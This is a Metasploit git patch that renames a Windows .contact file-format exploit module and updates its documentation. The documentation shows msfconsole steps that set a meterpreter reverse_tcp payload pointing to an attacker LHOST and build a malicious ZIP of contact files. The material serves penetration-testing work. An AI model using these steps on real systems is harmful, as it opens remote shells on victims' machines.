From 94785dabbb7f6aa806b027b8f1890e0b7aaf33be Mon Sep 17 00:00:00 2001 From: asoto-r7 Date: Wed, 10 Apr 2019 17:17:50 -0500 Subject: [PATCH] Renamed module from 'microsoft_windows_contact_remote_code_execution' to 'microsoft_windows_contact' --- ...ode_execution.md => microsoft_windows_contact.md} | 12 ++++++------ ...ode_execution.rb => microsoft_windows_contact.rb} | 2 +- 2 files changed, 7 insertions(+), 7 deletions(-) rename documentation/modules/exploit/windows/fileformat/{microsoft_windows_contact_remote_code_execution.md => microsoft_windows_contact.md} (79%) rename modules/exploits/windows/fileformat/{microsoft_windows_contact_remote_code_execution.rb => microsoft_windows_contact.rb} (98%) diff --git a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md similarity index 79% rename from documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md rename to documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md index f1e22a083e..dededa56a1 100644 --- a/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md +++ b/documentation/modules/exploit/windows/fileformat/microsoft_windows_contact.md @@ -26,7 +26,7 @@ Windows Contacts ## Verification Steps 1. `./msfconsole` -2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution` +2. `use exploit/windows/fileformat/microsoft_windows_contact` 3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp` 4. Configure the payload parameters. For example: `set LHOST 192.168.1.1` 5. Enter the name of the user to be embedded in the contact, which will also be used as the filename for the .ZIP and .CONTACTS files. For example, `set FILENAME John Smith` @@ -41,19 +41,19 @@ Windows Contacts 1. Configure the module-specific settings. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set WEBSITE metasploit.com +msf5 exploit(windows/fileformat/microsoft_windows_contact) > set WEBSITE metasploit.com WEBSITE => metasploit.com -msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME John Smith +msf5 exploit(windows/fileformat/microsoft_windows_contact) > set FILENAME John Smith FILENAME => John Smith ``` 2. Configure the payload. ``` -msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp +msf5 exploit(windows/fileformat/microsoft_windows_contact) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp -msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.1.148 +msf5 exploit(windows/fileformat/microsoft_windows_contact) > set LHOST 192.168.1.148 LHOST => 192.168.1.148 -msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run +msf5 exploit(windows/fileformat/microsoft_windows_contact) > run [+] Creating 'John Smith.zip' ``` diff --git a/modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb b/modules/exploits/windows/fileformat/microsoft_windows_contact.rb similarity index 98% rename from modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb rename to modules/exploits/windows/fileformat/microsoft_windows_contact.rb index 1979a47f4f..a9bc690d81 100644 --- a/modules/exploits/windows/fileformat/microsoft_windows_contact_remote_code_execution.rb +++ b/modules/exploits/windows/fileformat/microsoft_windows_contact.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Microsoft Windows Contact File Remote Code Execution', + 'Name' => 'Microsoft Windows Contact File Format Arbitary Code Execution', 'Description' => %q{ This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files node param which takes an expected website value, however if an attacker references an